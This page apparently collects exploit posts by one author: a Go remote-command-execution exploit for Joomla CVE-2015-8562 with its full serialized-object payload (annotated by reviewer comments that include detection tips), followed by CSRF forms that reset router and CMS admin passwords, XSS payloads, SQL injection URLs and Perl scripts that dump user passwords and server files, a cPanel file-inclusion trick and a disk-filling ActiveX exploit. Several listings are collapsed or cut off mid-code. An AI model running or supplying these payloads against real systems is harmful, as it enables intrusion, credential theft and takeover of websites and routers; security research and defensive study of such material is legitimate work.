Joomla 1.5.x to 3.4.5 Object Injection Exploit (golang)
package main
/* ** * Exploit Title: Joomla 1.5.x to 3.4.5 Object Injection Exploit * Exploit Author: Khashayar Fereidani ( http://fereidani.com ) * Version: 1.5.x to 3.4.5 * CVE : CVE-2015-8562 ** * THIS EXPLOIT PUBLISHED ONLY FOR EDUCATIONAL PROPOSES ANY ILLEGAL USAGE * IS ON YOUR OWN RESPONSIBILITY ** * How to run : (you need golang compiler from golang.org) * go run exploit.go http://target/path * or * go build exploit.go * ./exploit http://target/path ** * DEMO : $ ./exploit 192.168.1.113/joomla ### # Joomla Remote Command Execution 0day Exploit # Exploited by: Khashayar Fereidani # http://fereidani.com # Vulnerable Versions: 1.5.x to 3.4.5 ### Attacking to http://FILTERED.TLD/joomla/ Target is vulnerable ! # Command Line Documentation : read FILEPATH read file from FILEPATH dir DIRPATH list directory in DIRPATH exec COMMANDexecute system command eval phpcodeevaluate PHP Code helpdisplay this help exitclose exploit console [*] Examples: read /etc/passwd dir /etc/ exec ls -lah eval include('/etc/passwd') root@joomla:$ exec uname -a Linux vm2.local 3.19.0-25-generic #26~14.04.1-Ubuntu SMP Fri Jul 24 21:16:20 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux root@joomla:$ */

// NOTE(review): this listing reached the page collapsed onto two physical
// lines. The raw-string literals below have lost their original line breaks,
// and the file is cut off inside main, so only the request-building and
// response-parsing helpers can be read in full.
//
// Reading it defensively: the header comment above gives the affected range as
// Joomla 1.5.x to 3.4.5 (CVE-2015-8562), so any release in that range should be
// treated as exposed until upgraded past it.
import (
	"fmt"
	"net/http"
	"regexp"
	"os"
	"io/ioutil"
	"bytes"
	"net/http/cookiejar"
	"net/url"
	"bufio"
	"strings"
)

// target is the URL every request is POSTed to. It is only read in the visible
// code; the assignment is not shown (presumably in main — confirm).
var target string;

// helpString is the console help text. Its line breaks were lost when the
// listing was collapsed.
var helpString=`# Command Line Documentation : read FILEPATH read file from FILEPATH dir DIRPATH list directory in DIRPATH exec COMMANDexecute system command eval phpcodeevaluate PHP Code helpdisplay this help exitclose exploit console [*] Examples: read /etc/passwd dir /etc/ exec ls -lah eval include('/etc/passwd') `

// validHttpUrl matches a leading "http://" or "https://". Not used in the
// visible part of the file.
var validHttpUrl=regexp.MustCompile("^http[s]{0,1}://")

// resultRegex finds the literal marker "iMH3r3=" in a response body and
// captures everything after it; (?s) lets "." span newlines. newRequest makes
// the server echo the same marker in front of the command output, which is how
// the output is located inside the returned page.
var resultRegex=regexp.MustCompile("(?sm)iMH3r3=(.*)")

// cmdRegex splits a console line into a first word and the remainder. Not used
// in the visible part of the file.
var cmdRegex=regexp.MustCompile("(\\w+)\\s(.+)")

// newLine matches a single CR or LF. Not used in the visible part of the file.
var newLine=regexp.MustCompile("[\\n\\r]")

// client is the shared HTTP client. It is nil until assigned, and the
// assignment is not in the visible code (presumably main builds it together
// with the imported cookiejar — confirm).
var client *http.Client

// newRequest builds the POST request sent to target.
//
// The form field "1" carries PHP source: an echo of the "iMH3r3=" marker
// followed by command. The User-Agent header carries a serialized PHP object
// graph whose feed_url string is "eval($_POST[1]);..." — that is, the header is
// what would cause field "1" to be evaluated on a vulnerable server.
//
// It panics if http.NewRequest returns an error.
//
// Detection note: the request stands out in access logs and WAF telemetry
// because the User-Agent contains PHP serialization syntax (`}__test|` followed
// by `O:21:"JDatabaseDriverMysqli"`) and ends in bytes that are not valid
// UTF-8. A browser User-Agent contains neither.
func newRequest(command string) *http.Request{
	values:=url.Values{}
	values.Set("1","echo('iMH3r3=');"+command+";")
	req,err:=http.NewRequest("POST",target,bytes.NewBufferString(values.Encode()))
	if err!=nil{
		panic(err)
	}
	// The trailing "\xf0\xfd\xfd\xfd" appends four bytes that do not form valid
	// UTF-8. NOTE(review): presumably these make the database truncate the
	// stored session value — confirm against the CVE-2015-8562 write-up.
	req.Header.Set("User-Agent",`123}__test|O:21:"JDatabaseDriverMysqli":3:{s:4:"\0\0\0a";O:17:"JSimplepieFactory":0:{}s:21:"\0\0\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:5:"cache";b:1;s:19:"cache_name_function";s:6:"assert";s:10:"javascript";i:;s:8:"feed_url";s:43:"eval($_POST[1]);JFactory::getConfig();exit;";}i:1;s:4:"init";}}s:13:"\0\0\0connection";i:1;}`+"\xf0\xfd\xfd\xfd")
	req.Header.Add("Content-Type", "application/x-www-form-urlencoded")
	return req
}

// escape returns str with every single quote preceded by a backslash. It is
// not called anywhere in the visible part of the file.
func escape(str string) string{
	return strings.Replace(str,"'","\\'",-1)
}

// runCommand sends command through newRequest and prints whatever follows the
// "iMH3r3=" marker in the response body. Nothing is printed when the marker is
// absent. Transport errors are printed and otherwise ignored.
func runCommand(command string){
	res,err:=client.Do(newRequest(command))
	if err!=nil{
		fmt.Println(err.Error())
	}else{
		defer res.Body.Close()
		resBytes,err:=ioutil.ReadAll(res.Body)
		str:=string(resBytes)
		// NOTE(review): a read error is only printed; matching continues on
		// whatever part of the body was read.
		if err!=nil{
			fmt.Println(err)
		}
		match:=resultRegex.FindStringSubmatch(str)
		if len(match)>0{
			// match[0] is the whole match and starts with the 7-byte marker
			// "iMH3r3="; the slice drops it.
			fmt.Print(match[0][7:])
		}
	}
}

// confirm sends a request with an empty command and reports whether the
// "iMH3r3=" marker came back in the response body. It returns false on a
// transport error and on HTTP 500, which the author labels as a patched PHP
// version.
//
// NOTE(review): on the HTTP 500 path the function returns before the deferred
// Close is registered, so that response body is never closed.
func confirm() bool{
	res,err:=client.Do(newRequest(""))
	if err!=nil{
		fmt.Println(err)
		return false
	}else{
		if res.StatusCode==500{
			fmt.Println("Patched PHP Version :( !")
			return false
		}
		defer res.Body.Close()
		resBytes,err:=ioutil.ReadAll(res.Body)
		str:=string(resBytes)
		if err!=nil{
			fmt.Println(err)
		}
		match:=resultRegex.FindStringSubmatch(str)
		if len(match)>0{
			return true
		}else{
			return false
		}
	}
}

// main is cut off on this page right after its banner string begins; nothing
// beyond this point is visible.
func main(){
	fmt.Print(`### # Joomla Remote Command Execution 0day Exploit #
RecordPress Multiple Vulnerabilities
WebApplication : RecordPress 0.3.1 Type of vunlnerability : CSRF ( Change Admin Password ) And XSS Risk of use : Medium Producer Website : http://www.recordpress.org/ Discovered by : Khashayar Fereidanis Team Website : http://IRCRASH.COM Team Members : Khashayar Fereidani - Sina YazdanMehr - Arash Allebrahim English Forums : Http://IRCRASH.COM/forums/ Email : irancrash [ a t ] gmail [ d o t ] com Facebook : http://facebook.com/fereidani CSRF For Change Admin Password : html head/head body onLoad=javascript:document.form.submit() form action=http://examplesite/admin/rp-settings-users-edit-db.php?id=1;; method=POST name=form input type=hidden name=formusername value=admin input type=hidden name=formname value=admin input type=hidden name=formemail value=em...@pwnedpwnedpwned.sss input type=hidden name=formpass value=password input type=hidden name=formpass2 value=password input type=hidden name=formadminstatus value=2 input type=hidden name=rp-settings-users-edit-db value=Confirm+%BB /form /body /html Cross Site Scripting Vulnerabilities : http://examplesite/header.php?row[titledesc]=scriptalert(123)/script http://examplesite/admin/rp-menu.php?_SESSION[sess_user]=scriptalert(123)/script
Linksys Cisco Wag120N CSRF Vulnerability
Hardware : Linksys Cisco Wag120n(And perhaps similar versions) Type of vunlnerability : CSRF ( Change Admin Password And Add User ) Risk of use : High Producer Website : http://linksysbycisco.com Discovered by : Khashayar Fereidani Team Website : Http://IRCRASH.COM Team Members : Khashayar Fereidani - Sina YazdanMehr - Arash Allebrahim English Forums : Http://IRCRASH.COM/forums/ Email : irancrash [ a t ] gmail [ d o t ] com CSRF For Change Admin Password : #Use sysPasswd and sysConfirmPasswd to set new password html head/head body onLoad=javascript:document.form.submit() form action=http://192.168.1.1/setup.cgi;; method=POST name=form input type=hidden name=user_list value=1 input type=hidden name=h_user_list value=1 input type=hidden name=sysname value=admin input type=hidden name=sysPasswd value=password input type=hidden name=sysConfirmPasswd value=password input type=hidden name=remote_management value=enable input type=hidden name=http_wanport value=8080 input type=hidden name=upnp_enable value=enable input type=hidden name=wlan_enable value=enable input type=hidden name=igmp_proxy_enable value=enable input type=hidden name=save value=Save+Settings input type=hidden name=h_pwset value=yes input type=hidden name=sysname_changed value=yes input type=hidden name=pwchanged value=yes input type=hidden name=pass_is_default value=false input type=hidden name=h_remote_management value=enable input type=hidden name=pass_is_none value=no input type=hidden name=h_upnp_enable value=enable input type=hidden name=h_wlan_enable value=enable input type=hidden name=h_igmp_proxy_enable value=enable input type=hidden name=todo value=save input type=hidden name=this_file value=Administration.htm input type=hidden name=next_file value=Administration.htm input type=hidden name=message value= input type=hidden name=h_wps_cur_status value= /form /body /html CSRF For Add Administrator User: #Use sysPasswd and sysConfirmPasswd to set new password #if you add new user you should set 
pass_is_none=yes html head/head body onLoad=javascript:document.form.submit() form action=http://192.168.1.1/setup.cgi;; method=POST name=form input type=hidden name=user_list value=2 input type=hidden name=h_user_list value=2 input type=hidden name=sysname value=ircrash input type=hidden name=sysPasswd value=password input type=hidden name=sysConfirmPasswd value=password input type=hidden name=remote_management value=enable input type=hidden name=http_wanport value=8080 input type=hidden name=upnp_enable value=enable input type=hidden name=wlan_enable value=enable input type=hidden name=igmp_proxy_enable value=enable input type=hidden name=save value=Save+Settings input type=hidden name=h_pwset value=yes input type=hidden name=sysname_changed value=yes input type=hidden name=pwchanged value=yes input type=hidden name=pass_is_default value=false input type=hidden name=h_remote_management value=enable input type=hidden name=pass_is_none value=yes input type=hidden name=h_upnp_enable value=enable input type=hidden name=h_wlan_enable value=enable input type=hidden name=h_igmp_proxy_enable value=enable input type=hidden name=todo value=save input type=hidden name=this_file value=Administration.htm input type=hidden name=next_file value=Administration.htm input type=hidden name=message value= input type=hidden name=h_wps_cur_status value= /form /body /html
SMF (Simple Machine Forum) 1.1.11 XSS - Discovered by : Khashayar Fereidani
|| Script : SMF (Simple Machine Forum) 1.1.11 || Vulnerability Type : Active XSS ( Active Cross Site Scripting ) || Risk : Low || Discovered By Khashayar Fereidani || http://ircrash.com http://bugtraq.ircrash.com || Note : To use this vulnerability you need access to the censored-words panel . 1. First log in and go to : http://site/path/index.php?action=postsettings;sa=censor , then click "Click here to add another word." to add a new row . Set the new text box to : ircrash = scriptalert('Vulnerable')/script and save the page . 2. Open a new topic and set its title to : ircrash , fill in all fields and post the topic . 3. Open the forum home page . You will see the alert : Vulnerable . Any HTML or JavaScript code can be set this way ; an attacker could deface the forum home page or load an ActiveX control to deliver a virus . || Solution : filter the censor page variables with htmlspecialchars . || Tnx : Only For God
COMRaider Idefense Labs CreateFolder() and Copy() Insecure Method (Hard Disk Filler Exploit)
#!/usr/bin/perl ### # COMRaider Idefense Labs CreateFolder() and Copy() Insecure Method (Hard Disk Filler Exploit) # # Discovered and Exploited by : Khashayar Fereidani # Http://IRCRASH.com Http://Fereidani.ir # ### # Help : # perl comraider.pl # Please enter the foldername (C:\ircrash\ for example) : C:\ircrash\ # Please enter number of copy cmd to folder (1 or more for example) : 1 # ** Ok comraider.html created , now you can use this ### # Tnx : Only for God ### $cmd = 'C:\WINDOWS\system32\cmd.exe'; print 'Please enter the foldername (C:\ircrash\ for example) : '; $folder = stdin; print Please enter number of copy cmd to folder (1 or more for example) : ; $number = stdin; chomp $number; chomp $folder; $shellcode = chr(0x3C).chr(0x48).chr(0x54).chr(0x4D).chr(0x4C).chr(0x3E).chr(0xD).chr(0xA).chr(0x3C).chr(0x21).chr(0x2D).chr(0x2D).chr(0xD).chr(0xA).chr(0x43).chr(0x4F).chr(0x4D).chr(0x52).chr(0x61).chr(0x69).chr(0x64).chr(0x65).chr(0x72).chr(0x20).chr(0x49).chr(0x64).chr(0x65).chr(0x66).chr(0x65).chr(0x6E).chr(0x73).chr(0x65).chr(0x20).chr(0x4C).chr(0x61).chr(0x62).chr(0x73).chr(0x20).chr(0x43).chr(0x72).chr(0x65).chr(0x61).chr(0x74).chr(0x65).chr(0x46).chr(0x6F).chr(0x6C).chr(0x64).chr(0x65).chr(0x72).chr(0x28).chr(0x29).chr(0x20).chr(0x61).chr(0x6E).chr(0x64).chr(0x20).chr(0x43).chr(0x6F).chr(0x70).chr(0x79).chr(0x28).chr(0x29).chr(0x20).chr(0x49).chr(0x6E).chr(0x73).chr(0x65).chr(0x63).chr(0x75).chr(0x72).chr(0x65).chr(0x20).chr(0x4D).chr(0x65).chr(0x74).chr(0x68).chr(0x6F).chr(0x64).chr(0x20).chr(0x45).chr(0x78).chr(0x70).chr(0x6C).chr(0x6F).chr(0x69).chr(0x74).chr(0xD).chr(0xA).chr(0x44).chr(0x69).chr(0x73).chr(0x63).chr(0x6F).chr(0x76).chr(0x65).chr(0x72).chr(0x65).chr 
(0x64).chr(0x20).chr(0x62).chr(0x79).chr(0x20).chr(0x3A).chr(0x20).chr(0x4B).chr(0x68).chr(0x61).chr(0x73).chr(0x68).chr(0x61).chr(0x79).chr(0x61).chr(0x72).chr(0x20).chr(0x46).chr(0x65).chr(0x72).chr(0x65).chr(0x69).chr(0x64).chr(0x61).chr(0x6E).chr(0x69).chr(0xD).chr(0xA).chr(0x68).chr(0x74).chr(0x74).chr(0x70).chr(0x3A).chr(0x2F).chr(0x2F).chr(0x66).chr(0x65).chr(0x72).chr(0x65).chr(0x69).chr(0x64).chr(0x61).chr(0x6E).chr(0x69).chr(0x2E).chr(0x69).chr(0x72).chr(0x20).chr(0x26).chr(0x20).chr(0x68).chr(0x74).chr(0x74).chr(0x70).chr(0x3A).chr(0x2F).chr(0x2F).chr(0x69).chr(0x72).chr(0x63).chr(0x72).chr(0x61).chr(0x73).chr(0x68).chr(0x2E).chr(0x63).chr(0x6F).chr(0x6D).chr(0xD).chr(0xA).chr(0x2D).chr(0x2D).chr(0x3E).chr(0xD).chr(0xA).chr(0xD).chr(0xA).chr(0x3C).chr(0x6F).chr(0x62).chr(0x6A).chr(0x65).chr(0x63).chr(0x74).chr(0x20).chr(0x63).chr(0x6C).chr(0x61).chr(0x73).chr(0x73).chr(0x69).chr(0x64).chr(0x3D).chr(0x27).chr(0x63).chr(0x6C).chr(0x73).chr(0x69).chr(0x64).chr(0x3A). chr(0x39).chr(0x41).chr(0x30).chr(0x37).chr(0x37).chr(0x44).chr(0x30).chr(0x44).chr(0x2D).chr(0x42).chr(0x34).chr(0x41).chr(0x36).chr(0x2D).chr(0x34).chr(0x45).chr(0x43).chr(0x30).chr(0x2D).chr(0x42).chr(0x36).chr(0x43).chr(0x46).chr(0x2D).chr(0x39).chr(0x38).chr(0x35).chr(0x32).chr(0x36).chr(0x44).chr(0x46).chr(0x35).chr(0x38).chr(0x39).chr(0x45).chr(0x34).chr(0x27).chr(0x20).chr(0x69).chr(0x64).chr(0x3D).chr(0x27).chr(0x74).chr(0x61).chr(0x72).chr(0x67).chr(0x65).chr(0x74).chr(0x27).chr(0x3E).chr(0x3C).chr(0x2F).chr(0x6F).chr(0x62).chr(0x6A).chr(0x65).chr(0x63).chr(0x74).chr(0x3E).chr(0xD).chr(0xA).chr(0xD).chr(0xA).chr(0x3C).chr(0x73).chr(0x63).chr(0x72).chr(0x69).chr(0x70).chr(0x74).chr(0x20).chr(0x6C).chr(0x61).chr(0x6E).chr(0x67).chr(0x75).chr(0x61).chr(0x67).chr(0x65).chr(0x3D).chr(0x27).chr(0x76).chr(0x62).chr(0x73).chr(0x63).chr(0x72).chr(0x69).chr(0x70).chr(0x74).chr(0x27).chr(0x3E).chr(0xD).chr(0xA).chr(0x61).chr(0x72).chr(0x67).chr(0x66).chr(0x3D).chr(0x22).$fold 
er.chr(0x22).chr(0xD).chr(0xA).chr(0x74).chr(0x61).chr(0x72).chr(0x67).chr(0x65).chr(0x74).chr(0x2E).chr(0x43).chr(0x72).chr(0x65).chr(0x61).chr(0x74).chr(0x65).chr(0x46).chr(0x6F).chr(0x6C).chr(0x64).chr(0x65).chr(0x72).chr(0x20).chr(0x61).chr(0x72).chr(0x67).chr(0x66).chr(0xD).chr(0xA).chr(0x6E).chr(0x75).chr(0x6D).chr(0x62).chr(0x65).chr(0x72).chr(0x31).chr(0x20).chr(0x3D).chr(0x20).chr(0x30).chr(0xD).chr(0xA).chr(0x6E).chr(0x75).chr(0x6D).chr(0x62).chr(0x65).chr(0x72).chr(0x32).chr(0x20).chr(0x3D).chr(0x20).$number.chr(0xD).chr(0xA).chr(0x77).chr(0x68).chr(0x69).chr(0x6C).chr(0x65).chr(0x20).chr(0x28).chr(0x6E).chr(0x75).chr(0x6D).chr(0x62).chr(0x65).chr(0x72).chr(0x31).chr(0x20).chr(0x3C).chr(0x20).chr(0x6E).chr(0x75).chr(0x6D).chr(0x62).chr(0x65).chr(0x72).chr(0x32).chr(0x29).chr(0xD).chr(0xA).chr(0x6E).chr(0x75).chr(0x6D).chr(0x62).chr(0x65).chr(0x72).chr(0x31).chr(0x20).chr(0x3D).chr(0x20).chr(0x6E).chr(0x75).chr(0x6D).chr(0x62).chr(0x65).chr(0x72).chr(0x31).chr(0x20
PHP-Fusion Mod vArcade 1.8 Sql Injection Vulnerability
Script : PHP-Fusion Mod vArcade 1.8 Type : Sql Injection Vulnerability Risk : High Download From : http://venue.nu/ Discovered by : Khashayar Fereidani My Official Website : HTTP://FEREIDANI.IR Our Team Website : Http://IRCRASH.COM Khashayar Fereidani Email : irancrash [ a t ] gmail [ d o t ] com Sql Injection Vulnerability : Vulnerable address : http://[host]/[path]/infusions/varcade/callcomments.php?comment_id=%27+union+select+0,user_name,2,3,4,5,6,user_password+from+fusion_users+where+user_id=1/* Google Dark : inurl:/infusions/varcade/ Tnx : God HTTP://IRCRASH.COM HTTP://FEREIDANI.IR
Re: Re: Cpanel 11.x Local File Inclusion Cross Site Scripting - Discovered By Khashayar Fereidani
Hi , An attacker can bypass disable_functions , mod_security , safe_mode ... with this vulnerability . I think this is a good reason ! http://fereidani.ir - Khashayar Fereidani
Cpanel 11.x Local File Inclusion Cross Site Scripting - Discovered By Khashayar Fereidani
Script : Cpanel 11.x Type : Local File Inclusion Cross Site Scripting Risk : High Discovered by : Khashayar Fereidani I am 17 Years Old My Official Website : HTTP://FEREIDANI.IR Team Website : Http://IRCRASH.COM Team Members : Khashayar Fereidani - Hadi Kiamarsi - Sina YazdanMehr Khashayar Fereidani Email : irancrash [ a t ] gmail [ d o t ] com Local File Inclusion Vulnerability : Note : Rename your shell to config.php and upload with your ftp account in ./ directory , now login in cpanel and enter vulnerable address in url https://ServerIp:2083/frontend/x3/fantastico/autoinstall4imagesgalleryupgrade.php?action=GoAheadscriptpath_show=/home/[youruser]/ https://ServerIp:2083/frontend/x2/fantastico/autoinstall4imagesgalleryupgrade.php?action=GoAheadscriptpath_show=/home/[youruser]/ https://ServerIp:2083/frontend/x/fantastico/autoinstall4imagesgalleryupgrade.php?action=GoAheadscriptpath_show=/home/[youruser]/ Cross site scripting : File Address : frontend/x3/fantastico/autoinstall4imagesgalleryupgrade.php?action=Upgrade%20to%201.7.4 Set Action as Upgrade%20to%201.7.4 Vulnerable Variables : $localapp $updatedir $scriptpath_show $domain_show $thispage $thisapp $currentversion For Example : https://ServerIp:2083/frontend/x3/fantastico/autoinstall4imagesgalleryupgrade.php?action=Upgrade%20to%201.7.4localapp=%22%3Cscript%3Ealert(%27xss%27)%3C/script%3E Tnx : God HTTP://IRCRASH.COM HTTP://FEREIDANI.IR
Ezphotogallery 2.1 Multiple Vulnerabilities ( Xss/Login Bypass/Sql injection Exploit/File Disclosure)
#!/usr/bin/perl # # #Script : Ezphotogallery 2.1 # #Type : Multiple Vulnerabilities ( Xss/Login Bypass/Sql injection Exploit/File Disclosure) # #Method : GET # #Alert : High # #Google Dork : 100% | 50% | 25% Back to gallery inurl:show.php?imageid= # # # #Discovered by : Khashayar Fereidani a.k.a. Dr.Crash # #My Official Website : HTTP://FEREIDANI.IR # #Khashayar Fereidani Email : irancrash [ a t ] gmail [ d o t] com # # # #Khashayar Fereidani Official Website : HTTP://FEREIDANI.IR # # # #Script Download : http://heanet.dl.sourceforge.net/sourceforge/ezphotogallery/ezphotogallery-2.1.zip # # #Xss Vulnerabilities : # #Xss 1 : gallery.php?galleryid=scriptalert(document.cookie)/script #Xss 2 : show.php?imageid=156size=''?''scriptalert(document.cookie)/script #Xss 3 : show.php?imageid=scriptalert(document.cookie)/script # # #Login Bypass : # #Insert in gallery.php # #User : admin ' or ' 1=1 #Password : Dr.Crash # # #Sql Injection : # #Injection 1 : show.php?imageid=sql # # #Tnx : God # # HTTP://IRCRASH.COM # # use LWP; use HTTP::Request; use Getopt::Long; $scriptname=Ezphotogallery 2.1; sub header { print * $scriptname *Discovered by : Khashayar Fereidani * *Exploited by : Khashayar Fereidani* *My Official Website : http://fereidani.ir * ; } sub usage { print * Usage : perl $0 http://Example/ ; } $url = ($ARGV[0]); if(!$url) { header(); usage(); exit; } if($url !~ /\//){$url = $url./;} if($url !~ /http:\/\//){$url = http://.$url;} sub xpl1() { #concat(0x4c6f67696e3a,user,0x3c656e64757365723e,0x0d0a50617373776f72643a,password,0x3c656e64706173733e) $vul = /show.php?imageid=999+union+select+0,1,2,concat(0x4c6f67696e3a,name,0x3c656e64757365723e,0x0d0a50617373776f72643a,password,0x3c656e64706173733e),4,5,6,7,8,9+from+users/*; $requestpage = $url.$vul; my $req = HTTP::Request-new(POST,$requestpage); $ua = LWP::UserAgent-new; $ua-agent( 'Mozilla/5.0 Gecko/20061206 Firefox/1.5.0.9' ); #$req-referer($url); $req-referer(IRCRASH.COM); 
$req-content_type('application/x-www-form-urlencoded'); $req-header(content-length = $contlen); $req-content($poststring); $response = $ua-request($req); $content = $response-content; $header = $response-headers_as_string(); @name = split(/Login:/,$content); $name = @name[1]; @name = split(/enduser/,$name); $name = @name[0]; @password = split(/Password:/,$content); $password = @password[1]; @password = split(/endpass/,$password); $password = @password[0]; if(!$name !$password) { print \n\n; print !Exploit failed ! :(\n\n; exit; } print \n Username: .$name.\n\n; print Password: .$password.\n\n; } #XPL2 sub xpl2() { print \n Example For File Address : /home/user/public_html/config.php\n Or /etc/passwd; print \n Enter File Address :; $fil3 = stdin; $vul = /show.php?imageid=999+union+select+0,1,2,concat(0x4c6f67696e3a,load_file('$fil3'),0x3c656e64757365723e),4,5,6,7,8,9+from+users/*; $requestpage = $url.$vul; my $req = HTTP::Request-new(POST,$requestpage); $ua = LWP::UserAgent-new; $ua-agent( 'Mozilla/5.0 Gecko/20061206 Firefox/1.5.0.9' ); #$req-referer($url); $req-referer(IRCRASH.COM); $req-content_type('application/x-www-form-urlencoded'); $req-header(content-length = $contlen); $req-content($poststring); $response = $ua-request($req); $content = $response-content; $header = $response-headers_as_string(); @name = split(/Login:/,$content); $name = @name[1]; @name = split(/enduser/,$name); $name = @name[0]; if(!$name !$password) { print \n\n; print !Exploit failed ! :(\n\n; exit; } open (FILE, .source..txt); print FILE $name; close (FILE); print File Save In source.txt\n; print ; } #XPL2 END #Starting; print * $scriptname *Discovered by : Khashayar Fereidani * *Exploited by : Khashayar Fereidani* *My Official Website : http://fereidani.ir * * Mod Options :* * Mod 1
PhsBlog v0.2 Bypass Sql injection Filtering Exploit
#!/usr/bin/perl # # #Script : PhsBlog v0.2 # #Type : Bypass Sql injection Filtering Exploit # #Method : GET # #Risk : High # # # #Discovered by : Khashayar Fereidani a.k.a. Dr.Crash # #My Official Website : HTTP://FEREIDANI.IR # #Khashayar Fereidani Email : irancrash [ a t ] gmail [ d o t] com # # # #Khashayar Fereidani Official Website : HTTP://FEREIDANI.IR # # # #Script Download : http://www.phsdev.com/downloads/phsblog_current.zip # # # #Tnx : God # # HTTP://IRCRASH.COM # # use LWP; use HTTP::Request; use Getopt::Long; $scriptname=PhsBlog v0.2; sub header { print * $scriptname *Discovered by : Khashayar Fereidani * *Exploited by : Khashayar Fereidani* *My Official Website : http://fereidani.ir * ; } sub usage { print * Usage : perl $0 http://Example/ ; } $url = ($ARGV[0]); if(!$url) { header(); usage(); exit; } if($url !~ /\//){$url = $url./;} if($url !~ /http:\/\//){$url = http://.$url;} sub xpl1() { #concat(0x4c6f67696e3a,user,0x3c656e64757365723e,0x0d0a50617373776f72643a,password,0x3c656e64706173733e) $vul = /index.php?sql_cid=999'union+select+0,1,2,3,4,concat(0x4c6f67696e3a,username,0x3c656e64757365723e,0x0d0a50617373776f72643a,password,0x3c656e64706173733e),6,7,8,9,10,11,12+from+phsblog_users/*; $requestpage = $url.$vul; my $req = HTTP::Request-new(POST,$requestpage); $ua = LWP::UserAgent-new; $ua-agent( 'Mozilla/5.0 Gecko/20061206 Firefox/1.5.0.9' ); #$req-referer($url); $req-referer(IRCRASH.COM); $req-content_type('application/x-www-form-urlencoded'); $req-header(content-length = $contlen); $req-content($poststring); $response = $ua-request($req); $content = $response-content; $header = $response-headers_as_string(); @name = split(/Login:/,$content); $name = @name[1]; @name = split(/enduser/,$name); $name = @name[0]; @password = split(/Password:/,$content); $password = @password[1]; @password = split(/endpass/,$password); $password = @password[0]; if(!$name !$password) { print \n\n; print !Exploit failed ! 
:(\n\n; exit; } print \n Username: .$name.\n\n; print Password: .$password.\n\n; } #XPL2 sub xpl2() { print \n Example For File Address : /home/user/public_html/config.php\n Or /etc/passwd; print \n Enter File Address :; $fil3 = stdin; #index.php?sql_cid=999'union+select+0,1,2,3,4,concat(0x4c6f67696e3a,load_file('$fil3'),0x3c656e64757365723e),6,7,8,9,10,11,12+from+phsblog_users/* $vul = ?show=pickupsid=9'+union+select+0,concat(0x4c6f67696e3a,load_file('$fil3'),0x3c656e64757365723e),2,3,4,5,6,7,8,9,10,11,12,13+from+mysql.user/*; $requestpage = $url.$vul; my $req = HTTP::Request-new(POST,$requestpage); $ua = LWP::UserAgent-new; $ua-agent( 'Mozilla/5.0 Gecko/20061206 Firefox/1.5.0.9' ); #$req-referer($url); $req-referer(IRCRASH.COM); $req-content_type('application/x-www-form-urlencoded'); $req-header(content-length = $contlen); $req-content($poststring); $response = $ua-request($req); $content = $response-content; $header = $response-headers_as_string(); @name = split(/Login:/,$content); $name = @name[1]; @name = split(/enduser/,$name); $name = @name[0]; if(!$name !$password) { print \n\n; print !Exploit failed ! :(\n\n; exit; } open (FILE, .source..txt); print FILE $name; close (FILE); print File Save In source.txt\n; print ; } #XPL2 END #Starting; print * $scriptname *Discovered by : Khashayar Fereidani * *Exploited by : Khashayar Fereidani* *My Official Website : http://fereidani.ir * * Mod Options :* * Mod 1 : Find Script username and password* * Mod 2 : File Disclosure(not work in many servers)* ; print \n \n Enter Mod : ; $mod=stdin; if ($mod==1 or $mod==2) { print \n Exploiting .. \n; } else { print \n Unknown Mod ! \n Exploit Failed !; }; if ($mod==1) { xpl1(); }; if ($mod==2) { xpl2(); };
Nooms 1.1
Script : Nooms 1.1 Type : Multiple Vulnerabilities (Cross Site Scripting/Redirect/Mysql Brute Force Local Access) Risk : Medium Download From : http://surfnet.dl.sourceforge.net/sourceforge/nooms/nooms_1.1.zip Discovered by : Khashayar Fereidani Or Dr.Crash My Website : HTTP://FEREIDANI.IR Team Website : Http://IRCRASH.COM Khashayar Fereidani Email : irancrash [ a t ] gmail [ d o t ] com Mysql Remote Brute Force Vulnerability : This is a new type of vulnerability . I can't publish an exploit for it , but with this vulnerability an attacker can remotely brute-force the password of root and other users through PHP . Mysql Brute Force Vulnerability : /db.php?g_dbhost=localhostg_dbuser=[username]g_dbpwd=[password] Cross Site Scripting Vulnerabilities : Xss 1 : http://Example/smileys.php?page_id=scriptalert('xss')/script Xss 2 : http://Example/search.php?q=;scriptalert('xss')/script Redirect Vulnerability : Xss 1 : http://Example/admin/auth.php?g_site_url=[URL] Tnx : God HTTP://IRCRASH.COM HTTP://FEREIDANI.IR
Mambo 4.6.2 Full Version - Multiple Cross Site Scripting - By Khashayar Fereidani
Script : Mambo 4.6.2 Full Older Versions Type : Multiple Cross Site Scripting Vulnerabilities Alert Level : Medium Download From : http://surfnet.dl.sourceforge.net/sourceforge/mambo/MamboV4.6.2.zip Discovered by : Khashayar Fereidani My Website : HTTP://FEREIDANI.IR Khashayar Fereidani Email : irancrash [ a t ] gmail [ d o t ] com Cross Site Scripting Vulnerability 1 : Vulnerable File : administrator/popups/index3pop.php Vulnerable Line (5) : title?php echo $mosConfig_sitename; ? - Administration [Mambo]/title Vulnerable Variable : mosConfig_sitename For Example : http://Example/administrator/popups/index3pop.php?mosConfig_sitename=/titlescriptalert(document.cookie)/script An attacker can hijack the administrator's cookie and session and log in with them . Cross Site Scripting Vulnerability 2 : Vulnerable File : mambots/editors/mostlyce/jscripts/tiny_mce/filemanager/connectors/php/connector.php? Vulnerable Variable : Any Variable - You can set any variable For Example set (hacker) variable : http://Example/mambots/editors/mostlyce/jscripts/tiny_mce/filemanager/connectors/php/connector.php?khashayar=scriptalert('xss')/script The cross site scripting code can also be placed in the variable name : http://Example/mambots/editors/mostlyce/jscripts/tiny_mce/filemanager/connectors/php/connector.php?scriptalert('xss')/script=Hello+Word Tnx : God HTTP://IRCRASH.COM HTTP://FEREIDANI.IR
FlexCMS = 2.5 Cross Site Scripting Vulnerability
